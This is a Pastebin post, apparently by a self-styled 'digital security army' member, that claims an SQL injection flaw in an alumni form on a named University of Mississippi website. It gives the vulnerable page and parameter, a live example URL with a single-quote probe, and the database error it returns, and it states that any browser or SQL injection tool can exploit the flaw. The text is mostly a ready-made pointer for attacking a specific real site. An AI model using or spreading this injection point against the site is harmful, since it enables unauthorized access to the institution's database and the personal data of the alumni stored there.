Advertisement
KingSkrupellos

Croft Institute for International Studies Uni Mississipi SQL

Oct 6th, 2019
271
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Croft Institute for International Studies University of Mississippi SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 07/10/2019
  7. # Vendor Homepage : croft.olemiss.edu
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Croft Institute for International Studies University of Mississippi is prone to an
  22. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data
  23. before using it in an SQL query. Exploiting this issue could allow an attacker to compromise
  24. the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  25. A remote attacker can send a specially crafted request to the vulnerable application and
  26. execute arbitrary SQL commands in application`s database. Further exploitation of this
  27. vulnerability may result in unauthorized data manipulation.
  28. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  29.  
  30. ###################################################################
  31.  
  32. # SQL Injection Exploit :
  33. **********************
  34. /Pages/form.php?formtype=alumni&section=[SQL Injection]
  35.  
  36. ###################################################################
  37.  
  38. # Example Vulnerable Sites :
  39. *************************
  40. [+] croft.olemiss.edu/Pages/form.php?formtype=alumni&section=1%27
  41.  
  42. ###################################################################
  43.  
  44. # Example SQL Database Error :
  45. ****************************
  46. You have an error in your SQL syntax; check the manual that corresponds
  47. to your MySQL server version for the right syntax to use near '' at line 1
  48.  
  49. ###################################################################
  50.  
  51. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  52.  
  53. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement